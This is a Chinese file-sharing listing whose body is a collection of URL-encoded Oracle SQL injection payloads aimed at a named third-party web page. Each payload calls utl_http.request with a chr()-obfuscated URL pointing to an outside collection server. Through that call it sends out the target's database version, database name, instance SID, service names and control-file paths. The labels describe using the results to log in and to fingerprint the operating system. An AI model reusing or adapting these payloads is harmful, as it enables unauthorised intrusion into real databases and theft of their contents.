utl_http.request包探测基本信息.txt_Oracleutl

需积分: 27 185 浏览量 2019-07-18 13:41:44 上传评论收藏 31KB TXT 举报

资源推荐

资源详情

资源评论

http://www.1872.tw/News.Site/show.jsp?info_id=59865

Database Version版本信息：

http://www.nosec.org/product/oracle_info.txt

统计条数：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20v$version%20where%201=1))%20from%20dual)%20and%201=1

第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(banner)%20as%20a%20from%20v$version%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

第二条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(banner)%20as%20a%20from%20v$version%20where%20rownum%3C=2%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E2-1%20order%20by%201)t))%20from%20dual)%20and%201=1

Database Name 数据裤名：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(name)%20from%20v$database%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1

instance_name sid登陆数据裤要用的：

%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20rawtohex(name)%20from%20v$database%20where%20rownum=1%20and%201=1))%20from%20dual)%20and%201=1

service_names服务器名：
统计：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20v$parameter%20where%20name=chr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(118)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(115)))%20from%20dual)%20and%201=1
第一条：
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(value)%20as%20a%20from%20v$parameter%20where%20rownum%3C=1%20and%20name=chr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(118)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(110)%7C%7Cchr(97)%7C%7Cchr(109)%7C%7Cchr(101)%7C%7Cchr(115)%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

control_files：loc文件目录，可以来判断操作系统
%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(value)%20as%20a%20from%20v$parameter%20where%20rownum%3C=1%20and%20name=chr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(108)%7C%7Cchr(95)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(115)%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1